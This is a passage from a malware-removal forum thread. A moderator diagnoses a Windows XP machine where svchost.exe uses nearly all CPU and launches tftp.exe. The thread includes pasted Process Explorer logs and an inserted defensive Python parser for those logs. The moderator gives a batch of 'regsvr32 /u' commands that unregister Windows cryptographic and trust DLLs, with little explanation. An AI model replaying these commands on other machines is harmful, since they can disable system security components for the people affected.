userenv.dll Userenv Microsoft Corporation 5.01.2600.1106
w32time.dll Windows Time Service Microsoft Corporation 5.01.2600.1106
wdigest.dll Microsoft Digest Access Microsoft Corporation 5.01.2600.0000
winipsec.dll Windows IPSec SPD Client DLL Microsoft Corporation 5.01.2600.0000
wldap32.dll Win32 LDAP API DLL Microsoft Corporation 5.01.2600.1106
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation 5.01.2600.0000
ws2help.dll Windows Socket 2.0 Helper for Windows NT Microsoft Corporation 5.01.2600.0000
wshtcpip.dll Windows Sockets Helper DLL Microsoft Corporation 5.01.2600.0000
  • 0

#204
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Nothing in that list that shouldn't be there.

Only your file versions are SP1 or older, when they should be at SP2.

I can't shake the feeling that something gets activated as soon as you connect to the internet.
Looking at your PG logs, lsass.exe was a logical suspect, since the connection to the malware server seems to be triggered by (or immediately after) it.

Can you repeat this procedure for the svchost process with the lowest PID?
In your last log that was 652; it is usually directly under services.exe in the list of applications.

Regards,
  • 0
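The check the post above does by eye (is anything foreign loaded, and are the file versions at SP1 rather than SP2) can be scripted against the Process Explorer module list. Added example, not code from the thread or from Process Explorer: the parser assumes the pasted dump lost its column separators, recognises only the vendors in KNOWN_VENDORS, treats build 2600 revisions below 2180 (XP SP2) as pre-SP2, and the example_hook.dll row is constructed so the vendor check has something to flag.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Excerpt of the lsass.exe module list posted in the thread, plus one constructed
# non-Microsoft row (example_hook.dll, not from the thread).
SAMPLE_DUMP = """Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
ctype.nls
lsass.exe LSA Shell (Export Version) Microsoft Corporation 5.01.2600.1106
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
oleaut32.dll Microsoft OLE 3.50 for Windows NT and Windows 95 Operating Systems Microsoft Corporation 3.50.5016.0000
rsaenh.dll Microsoft Base Cryptographic Provider Microsoft Corporation 5.01.2600.1029
example_hook.dll Example Hook Library Example Vendor 1.0.0.1
"""

# Assumption: vendors we know how to split off the end of the flattened row.
KNOWN_VENDORS = ("Microsoft Corporation",)
# Data files mapped into the process carry no vendor or version; do not flag them.
DATA_FILE_EXT = (".nls", ".evt")
# Windows XP SP2 system files carry build 2600, revision 2180 (SP1 was 2600.1106).
XP_SP2 = (2600, 2180)
VERSION_RE = re.compile(r" (\d+(?:\.\d+){3})$")


@dataclass
class Module:
    name: str
    description: str
    company: Optional[str]
    version: Optional[Tuple[int, ...]]


def parse_module_dump(text: str) -> List[Module]:
    """Heuristic parser for a Process Explorer lower-pane dump whose tab
    separators were lost when pasted: name is the first token, version (if any)
    is the trailing a.b.c.d, vendor is a known suffix, the rest is description."""
    modules: List[Module] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Name Description"):
            continue  # blank line or column header
        name, _, rest = line.partition(" ")
        version = None
        m = VERSION_RE.search(rest)
        if m:
            version = tuple(int(part) for part in m.group(1).split("."))
            rest = rest[: m.start()]
        company = None
        for vendor in KNOWN_VENDORS:
            if rest.endswith(vendor):
                company = vendor
                rest = rest[: -len(vendor)]
                break
        modules.append(Module(name, rest.strip(), company, version))
    return modules


def pre_service_pack(modules: List[Module], baseline=XP_SP2) -> List[str]:
    """Known-vendor modules on the baseline build with an older revision,
    e.g. 5.1.2600.1106 (SP1) when 2600.2180 (SP2) is expected."""
    build, revision = baseline
    return [m.name for m in modules
            if m.company in KNOWN_VENDORS and m.version is not None
            and m.version[2] == build and m.version[3] < revision]


def unknown_vendor(modules: List[Module]) -> List[str]:
    """Loaded code modules (data files excluded) with no recognised vendor;
    these are the rows worth checking by hand."""
    return [m.name for m in modules
            if m.company is None and not m.name.lower().endswith(DATA_FILE_EXT)]


if __name__ == "__main__":
    mods = parse_module_dump(SAMPLE_DUMP)
    print("pre-SP2 modules:", pre_service_pack(mods))
    print("unrecognised vendor:", unknown_vendor(mods))
```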

#205
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
Hello, hope I got this right. The first two posts of logs are when running normal; log 3 is when the CPU locks up as it is 100% committed.
Process PID CPU Description Company Name
System Idle Process 0 73.53
Interrupts n/a Hardware Interrupts
DPCs n/a 0.98 Deferred Procedure Calls
System 4 4.90
SMSS.EXE 360 Windows NT Session Manager Microsoft Corporation
CSRSS.EXE 412 Client Server Runtime Process Microsoft Corporation
WINLOGON.EXE 436 Windows NT Logon Application Microsoft Corporation
SERVICES.EXE 480 0.98 Services and Controller app Microsoft Corporation
SVCHOST.EXE 652 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 676 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 740 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 800 Generic Host Process for Win32 Services Microsoft Corporation
SPOOLSV.EXE 1068 Spooler SubSystem App Microsoft Corporation
ALG.EXE 1180 Application Layer Gateway Service Microsoft Corporation
AVGAMSVR.EXE 1192 AVG Alert Manager GRISOFT, s.r.o.
AVGW.EXE 1884 17.65 AVG 7.0 GRISOFT, s.r.o.
AVGUPSVC.EXE 1244 AVG Update Service GRISOFT, s.r.o.
DCSUserProt.exe 1284 DiamondCS ProcessGuard Service DiamondCS
ewidoctrl.exe 1316 ewido control ewido networks
NVSVC32.EXE 1412 NVIDIA Driver Helper Service, Version 42.30 NVIDIA Corporation
TCPSVCS.EXE 1500 TCP/IP Services Application Microsoft Corporation
SVCHOST.EXE 1636 Generic Host Process for Win32 Services Microsoft Corporation
LSASS.EXE 492 LSA Shell (Export Version) Microsoft Corporation
EXPLORER.EXE 1008 Windows Explorer Microsoft Corporation
HPZTSB07.EXE 1324 HP
Directcd.exe 1332 DirectCD Application Roxio
AVGCC.EXE 1620 AVG Control Center GRISOFT, s.r.o.
AVGEMC.EXE 1696 AVG E-Mail Scanner GRISOFT, s.r.o.
REGPROT.EXE 1736
pgaccount.exe 1856 pgaccount DiamondCS
procguard.exe 160 GUI Aspect of ProcessGuard DiamondCS
RUNDLL32.EXE 184 Run a DLL as an App Microsoft Corporation
procexp.exe 1352 1.96 Sysinternals Process Explorer Sysinternals

Process: SERVICES.EXE Pid: 480

Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
AppEvent.Evt
apphelp.dll Application Compatibility Client Library Microsoft Corporation 5.01.2600.1106
authz.dll Authorization Framework Microsoft Corporation 5.01.2600.0000
c_850.nls
ctype.nls
eventlog.dll Event Logging Service Microsoft Corporation 5.01.2600.1106
gdi32.dll GDI Client DLL Microsoft Corporation 5.01.2600.1106
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation 5.01.2600.1106
locale.nls
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
ncobjapi.dll Microsoft Corporation 5.01.2600.1106
netapi32.dll Net Win32 API DLL Microsoft Corporation 5.01.2600.1106
ntdll.dll NT Layer DLL Microsoft Corporation 5.01.2600.1106
psapi.dll Process Status Helper Microsoft Corporation 5.01.2600.1106
rpcrt4.dll Remote Procedure Call Runtime Microsoft Corporation 5.01.2600.1106
scesrv.dll Windows Security Configuration Editor Engine Microsoft Corporation 5.01.2600.1106
SecEvent.Evt
secur32.dll Security Support Provider Interface Microsoft Corporation 5.01.2600.1106
services.exe Services and Controller app Microsoft Corporation 5.01.2600.0000
sortkey.nls
sorttbls.nls
SysEvent.Evt
umpnpmgr.dll User-mode Plug-and-Play Service Microsoft Corporation 5.01.2600.1106
unicode.nls
user32.dll Windows XP USER API Client DLL Microsoft Corporation 5.01.2600.1106
userenv.dll Userenv Microsoft Corporation 5.01.2600.1106
winsta.dll Winstation Library Microsoft Corporation 5.01.2600.1106
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation 5.01.2600.0000
ws2help.dll Windows Socket 2.0 Helper for Windows NT Microsoft Corporation 5.01.2600.0000
wtsapi32.dll Windows Terminal Server SDK APIs Microsoft Corporation 5.01.2600.1106

log 2
Process PID CPU Description Company Name
System Idle Process 0 37.25
Interrupts n/a 2.94 Hardware Interrupts
DPCs n/a Deferred Procedure Calls
System 4 2.94
SMSS.EXE 360 Windows NT Session Manager Microsoft Corporation
CSRSS.EXE 412 Client Server Runtime Process Microsoft Corporation
WINLOGON.EXE 436 Windows NT Logon Application Microsoft Corporation
SERVICES.EXE 480 Services and Controller app Microsoft Corporation
SVCHOST.EXE 652 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 676 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 740 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 800 Generic Host Process for Win32 Services Microsoft Corporation
SPOOLSV.EXE 1068 Spooler SubSystem App Microsoft Corporation
ALG.EXE 1180 Application Layer Gateway Service Microsoft Corporation
AVGAMSVR.EXE 1192 AVG Alert Manager GRISOFT, s.r.o.
AVGW.EXE 1884 45.10 AVG 7.0 GRISOFT, s.r.o.
AVGUPSVC.EXE 1244 AVG Update Service GRISOFT, s.r.o.
DCSUserProt.exe 1284 DiamondCS ProcessGuard Service DiamondCS
ewidoctrl.exe 1316 ewido control ewido networks
NVSVC32.EXE 1412 NVIDIA Driver Helper Service, Version 42.30 NVIDIA Corporation
TCPSVCS.EXE 1500 TCP/IP Services Application Microsoft Corporation
SVCHOST.EXE 1636 Generic Host Process for Win32 Services Microsoft Corporation
LSASS.EXE 492 LSA Shell (Export Version) Microsoft Corporation
EXPLORER.EXE 1008 Windows Explorer Microsoft Corporation
HPZTSB07.EXE 1324 HP
Directcd.exe 1332 DirectCD Application Roxio
AVGCC.EXE 1620 AVG Control Center GRISOFT, s.r.o.
AVGEMC.EXE 1696 AVG E-Mail Scanner GRISOFT, s.r.o.
REGPROT.EXE 1736
pgaccount.exe 1856 pgaccount DiamondCS
procguard.exe 160 GUI Aspect of ProcessGuard DiamondCS
RUNDLL32.EXE 184 Run a DLL as an App Microsoft Corporation
procexp.exe 1352 11.76 Sysinternals Process Explorer Sysinternals

Process: SVCHOST.EXE Pid: 652

Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
ctype.nls
dnsapi.dll DNS Client API DLL Microsoft Corporation 5.01.2600.1106
gdi32.dll GDI Client DLL Microsoft Corporation 5.01.2600.1106
iphlpapi.dll IP Helper API Microsoft Corporation 5.01.2600.0002
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation 5.01.2600.1106
locale.nls
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation 5.01.2600.0000
ntdll.dll NT Layer DLL Microsoft Corporation 5.01.2600.1106
rasadhlp.dll Remote Access AutoDial Helper Microsoft Corporation 5.01.2600.0000
rpcrt4.dll Remote Procedure Call Runtime Microsoft Corporation 5.01.2600.1106
rpcss.dll Distributed COM Services Microsoft Corporation 5.01.2600.1106
secur32.dll Security Support Provider Interface Microsoft Corporation 5.01.2600.1106
sortkey.nls
sorttbls.nls
svchost.exe Generic Host Process for Win32 Services Microsoft Corporation 5.01.2600.0000
unicode.nls
user32.dll Windows XP USER API Client DLL Microsoft Corporation 5.01.2600.1106
userenv.dll Userenv Microsoft Corporation 5.01.2600.1106
winrnr.dll LDAP RnR Provider DLL Microsoft Corporation 5.01.2600.0000
wldap32.dll Win32 LDAP API DLL Microsoft Corporation 5.01.2600.1106
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation 5.01.2600.0000
ws2help.dll Windows Socket 2.0 Helper for Windows NT Microsoft Corporation 5.01.2600.0000
wshtcpip.dll Windows Sockets Helper DLL Microsoft Corporation 5.01.2600.0000

log 3
Process PID CPU Description Company Name
System Idle Process 0
Interrupts n/a 1.21 Hardware Interrupts
DPCs n/a 0.88 Deferred Procedure Calls
System 4 3.36
SMSS.EXE 360 Windows NT Session Manager Microsoft Corporation
CSRSS.EXE 412 Client Server Runtime Process Microsoft Corporation
WINLOGON.EXE 436 Windows NT Logon Application Microsoft Corporation
SERVICES.EXE 480 0.07 Services and Controller app Microsoft Corporation
SVCHOST.EXE 652 95.18 Generic Host Process for Win32 Services Microsoft Corporation
tftp.exe 764 Trivial File Transfer Protocol App Microsoft Corporation
SVCHOST.EXE 676 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 740 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 800 Generic Host Process for Win32 Services Microsoft Corporation
SPOOLSV.EXE 1068 Spooler SubSystem App Microsoft Corporation
ALG.EXE 1180 Application Layer Gateway Service Microsoft Corporation
AVGAMSVR.EXE 1192 AVG Alert Manager GRISOFT, s.r.o.
AVGUPSVC.EXE 1244 AVG Update Service GRISOFT, s.r.o.
DCSUserProt.exe 1284 DiamondCS ProcessGuard Service DiamondCS
ewidoctrl.exe 1316 ewido control ewido networks
NVSVC32.EXE 1412 NVIDIA Driver Helper Service, Version 42.30 NVIDIA Corporation
TCPSVCS.EXE 1500 TCP/IP Services Application Microsoft Corporation
SVCHOST.EXE 1636 Generic Host Process for Win32 Services Microsoft Corporation
LSASS.EXE 492 LSA Shell (Export Version) Microsoft Corporation
EXPLORER.EXE 1008 0.44 Windows Explorer Microsoft Corporation
HPZTSB07.EXE 1324 HP
Directcd.exe 1332 DirectCD Application Roxio
AVGCC.EXE 1620 AVG Control Center GRISOFT, s.r.o.
AVGEMC.EXE 1696 AVG E-Mail Scanner GRISOFT, s.r.o.
REGPROT.EXE 1736
pgaccount.exe 1856 pgaccount DiamondCS
procguard.exe 160 GUI Aspect of ProcessGuard DiamondCS
firefox.exe 484 Firefox Mozilla
RUNDLL32.EXE 184 Run a DLL as an App Microsoft Corporation
procexp.exe 1352 0.37 Sysinternals Process Explorer Sysinternals

Process: SVCHOST.EXE Pid: 652

Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
ctype.nls
dnsapi.dll DNS Client API DLL Microsoft Corporation 5.01.2600.1106
gdi32.dll GDI Client DLL Microsoft Corporation 5.01.2600.1106
iphlpapi.dll IP Helper API Microsoft Corporation 5.01.2600.0002
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation 5.01.2600.1106
locale.nls
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation 5.01.2600.0000
ntdll.dll NT Layer DLL Microsoft Corporation 5.01.2600.1106
rasadhlp.dll Remote Access AutoDial Helper Microsoft Corporation 5.01.2600.0000
rpcrt4.dll Remote Procedure Call Runtime Microsoft Corporation 5.01.2600.1106
rpcss.dll Distributed COM Services Microsoft Corporation 5.01.2600.1106
secur32.dll Security Support Provider Interface Microsoft Corporation 5.01.2600.1106
sortkey.nls
sorttbls.nls
svchost.exe Generic Host Process for Win32 Services Microsoft Corporation 5.01.2600.0000
unicode.nls
user32.dll Windows XP USER API Client DLL Microsoft Corporation 5.01.2600.1106
userenv.dll Userenv Microsoft Corporation 5.01.2600.1106
winrnr.dll LDAP RnR Provider DLL Microsoft Corporation 5.01.2600.0000
wldap32.dll Win32 LDAP API DLL Microsoft Corporation 5.01.2600.1106
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation 5.01.2600.0000
ws2help.dll Windows Socket 2.0 Helper for Windows NT Microsoft Corporation 5.01.2600.0000
wshtcpip.dll Windows Sockets Helper DLL Microsoft Corporation 5.01.2600.0000
  • 0

#206
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Errm. Dumb question probably.
Did you download Firefox from the Mozilla site?
Or did you get it from somewhere else?

In Process Explorer you can click View > Show Fractional CPU

Can you tell me which one is extremely high when your computer freezes up?

Regards,
  • 0

#207
duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
Hello,
No such thing as a dumb question, especially here.
I got Firefox from a CD-ROM included in a magazine called netguide. I have downloaded the update from the Mozilla site. I don't know if this is the information you require, but the last log, log3, is the one that shows the high percentage of usage when the computer freezes. I managed to single it out while I was using the computer. Is this the information you needed?
Cheers
  • 0

#208
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Not paying close enough attention. Sorry.

This is what I was looking for:
SVCHOST.EXE 652 95.18 Generic Host Process for Win32 Services Microsoft Corporation

That is the process using up all the resources.

I see no DLLs that don't belong there, but I noticed one missing. That may be due to the SP.

Can you try this:

Click Start > Run > cmd > OK

In the command prompt type these commands, each line followed by Enter:

regsvr32 /u softpub.dll
regsvr32 /u wintrust.dll
regsvr32 /u initpki.dll
regsvr32 /u dssenh.dll
regsvr32 /u rsaenh.dll
regsvr32 /u gpkcsp.dll
regsvr32 /u sccbase.dll
regsvr32 /u slbcsp.dll
regsvr32 /u mssip32.dll
regsvr32 /u cryptdlg.dll


You may have to put ProcessGuard in Learning mode to perform this successfully, so please stay offline until you are done and reboot.

Regards,
  • 0

#209
duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
Hello, have done that. Had one lock-up since; wasn't fast enough to get a logfile, but did save one under svchost 652 after reboot. Hope this helps. It seems to pop up "trivial file transfer", hope this is of some help. Also had a svchost 732 pop up which caused the "TFT" to activate and lock up, but it has since disappeared.
Thanks for your help
Process PID CPU Description Company Name
System Idle Process 0 91.18
Interrupts n/a 0.98 Hardware Interrupts
DPCs n/a Deferred Procedure Calls
System 4
SMSS.EXE 360 Windows NT Session Manager Microsoft Corporation
CSRSS.EXE 412 Client Server Runtime Process Microsoft Corporation
WINLOGON.EXE 440 Windows NT Logon Application Microsoft Corporation
SERVICES.EXE 484 0.98 Services and Controller app Microsoft Corporation
SVCHOST.EXE 652 Generic Host Process for Win32 Services Microsoft Corporation
nutc.exe 460
SVCHOST.EXE 676 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 732 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 776 Generic Host Process for Win32 Services Microsoft Corporation
SPOOLSV.EXE 1052 Spooler SubSystem App Microsoft Corporation
ALG.EXE 1176 Application Layer Gateway Service Microsoft Corporation
AVGAMSVR.EXE 1188 AVG Alert Manager GRISOFT, s.r.o.
AVGUPSVC.EXE 1236 AVG Update Service GRISOFT, s.r.o.
DCSUserProt.exe 1284 DiamondCS ProcessGuard Service DiamondCS
NVSVC32.EXE 1388 NVIDIA Driver Helper Service, Version 42.30 NVIDIA Corporation
TCPSVCS.EXE 1528 TCP/IP Services Application Microsoft Corporation
SVCHOST.EXE 1620 Generic Host Process for Win32 Services Microsoft Corporation
LSASS.EXE 496 LSA Shell (Export Version) Microsoft Corporation
EXPLORER.EXE 1008 Windows Explorer Microsoft Corporation
HPZTSB07.EXE 1292 HP
Directcd.exe 1300 DirectCD Application Roxio
AVGCC.EXE 1488 AVG Control Center GRISOFT, s.r.o.
AVGEMC.EXE 1544 AVG E-Mail Scanner GRISOFT, s.r.o.
REGPROT.EXE 1608
pgaccount.exe 1864 pgaccount DiamondCS
procguard.exe 1980 GUI Aspect of ProcessGuard DiamondCS
FIREFOX.EXE 1352 Firefox Mozilla
RUNDLL32.EXE 1984 Run a DLL as an App Microsoft Corporation
procexp.exe 848 6.86 Sysinternals Process Explorer Sysinternals

Process: SVCHOST.EXE Pid: 652

Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
apphelp.dll Application Compatibility Client Library Microsoft Corporation 5.01.2600.1106
ctype.nls
dnsapi.dll DNS Client API DLL Microsoft Corporation 5.01.2600.1106
gdi32.dll GDI Client DLL Microsoft Corporation 5.01.2600.1106
iphlpapi.dll IP Helper API Microsoft Corporation 5.01.2600.0002
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation 5.01.2600.1106
locale.nls
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation 5.01.2600.0000
ntdll.dll NT Layer DLL Microsoft Corporation 5.01.2600.1106
rasadhlp.dll Remote Access AutoDial Helper Microsoft Corporation 5.01.2600.0000
rpcrt4.dll Remote Procedure Call Runtime Microsoft Corporation 5.01.2600.1106
rpcss.dll Distributed COM Services Microsoft Corporation 5.01.2600.1106
secur32.dll Security Support Provider Interface Microsoft Corporation 5.01.2600.1106
sortkey.nls
sorttbls.nls
svchost.exe Generic Host Process for Win32 Services Microsoft Corporation 5.01.2600.0000
unicode.nls
user32.dll Windows XP USER API Client DLL Microsoft Corporation 5.01.2600.1106
userenv.dll Userenv Microsoft Corporation 5.01.2600.1106
winrnr.dll LDAP RnR Provider DLL Microsoft Corporation 5.01.2600.0000
wldap32.dll Win32 LDAP API DLL Microsoft Corporation 5.01.2600.1106
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation 5.01.2600.0000
ws2help.dll Windows Socket 2.0 Helper for Windows NT Microsoft Corporation 5.01.2600.0000
wshtcpip.dll Windows Sockets Helper DLL Microsoft Corporation 5.01.2600.0000
  • 0

#210
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Hmm. Can you do a find files for nutc.exe?

Let me know where you find it, what it says under Properties and what http://virusscan.jotti.org/ has to say about it.

Regards,
  • 0





